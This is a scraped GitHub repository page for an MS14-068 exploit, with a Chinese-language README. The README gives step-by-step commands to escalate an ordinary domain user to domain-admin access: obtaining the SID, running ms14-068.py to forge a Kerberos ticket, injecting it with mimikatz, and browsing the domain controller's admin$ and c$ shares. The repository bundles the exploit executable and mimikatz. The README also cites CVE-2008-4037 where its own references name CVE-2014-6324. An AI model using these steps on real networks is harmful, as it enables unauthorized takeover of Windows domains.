Name	Name	Last commit message	Last commit date
parent directory ..
img	img
pykek	pykek
MS14-068.exe	MS14-068.exe
README.md	README.md
mimikatz_trunk.zip	mimikatz_trunk.zip

Name

Last commit message

Last commit date

img

pykek

MS14-068.exe

README.md

mimikatz_trunk.zip

MS14-068

将普通域用户权限提升为域控权限  
（漏洞利用后，netuse \\swg.server.com\c$可以直接访问域控的网络资源

Vulnerability reference:

MS14-068
CVE-2008-4037

Usage

域管理员:DCwin03 域名:demo.com 普通域用户:hx

登录普通域用户hx，cmd中输入"whoami/user"获取sid
demo/hx S-1-5-21-3813283032-1038476579-1047458262-1110

退出域用户hx，登录本地用户123

python ms14-068.py -u [email protected] -p pwd_of_hx -s S-1-5-21-3813283032-1038476579-1047458262-1110 -d DCwin03.demo.com

c:\User\123>Mimikatz.exe "kerberos::ptc [email protected]" exit  
  
net use \\DCwin03\admin$  

dir \\DCwin03\c$

References

Additional information about CVE-2014-6324
深入解读MS14-068漏洞
Attack Methods for Gaining Domain Admin Rights in Active Directory
MS14068域控提权漏洞及其防护
MS14-068 privilege escalation PoC

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

MS14-068

MS14-068

img

img

pykek

pykek

MS14-068.exe

MS14-068.exe

README.md

README.md

mimikatz_trunk.zip

mimikatz_trunk.zip

README.md

MS14-068

Usage

References

Files

MS14-068

Directory actions

More options

Directory actions

More options

Latest commit

History

MS14-068

Folders and files

parent directory

MS14-068

Usage

References